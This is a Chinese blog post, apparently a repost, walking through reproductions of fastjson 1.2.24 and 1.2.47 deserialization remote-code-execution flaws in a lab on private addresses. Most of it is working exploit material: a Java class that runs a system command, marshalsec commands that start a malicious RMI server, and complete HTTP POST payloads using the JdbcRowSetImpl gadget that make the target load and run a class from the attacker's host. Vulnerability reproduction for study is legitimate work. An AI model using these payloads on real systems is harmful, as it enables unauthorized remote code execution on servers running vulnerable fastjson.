其他分享
首页 > 其他分享> > fastjson漏洞复现

fastjson漏洞复现

作者:互联网

1.2.24-rce

1.post发送一个JSON对象,即可更新服务端的信息:

 curl http://192.168.0.108:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'

2.借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class

javac TouchFile.java    #编译生成class文件
python -m SimpleHTTPServer 80  

git clone https://github.com/mbechler/marshalsec.git 
cd marshalsec   
mvn clean package -DskipTests     #需要等很久
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.105/#TouchFile" 9999

3.发送POST请求

POST / HTTP/1.1
Host: 192.168.0.108:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 167
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.105:9999/TouchFile",
        "autoCommit":true
    }
}

java不熟悉,学完了java再进行漏洞原理分析https://www.freebuf.com/vuls/208339.html

 

 

1.2.47-rce

1.访问192.168.0.105:8090抓包修改content-type为json

2.编译并执行上传代码TouchFile.class

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

3.启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.105/#TouchFile" 9999  
python -m SimpleHTTPServer 80  
POST / HTTP/1.1
Host: 192.168.0.108:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 271

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.105:9999/TouchFile",
        "autoCommit":true
    }

}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

标签:fastjson,java,Accept,TouchFile,192.168,9999,漏洞,复现,marshalsec
来源: https://blog.csdn.net/qq_34640691/article/details/116035000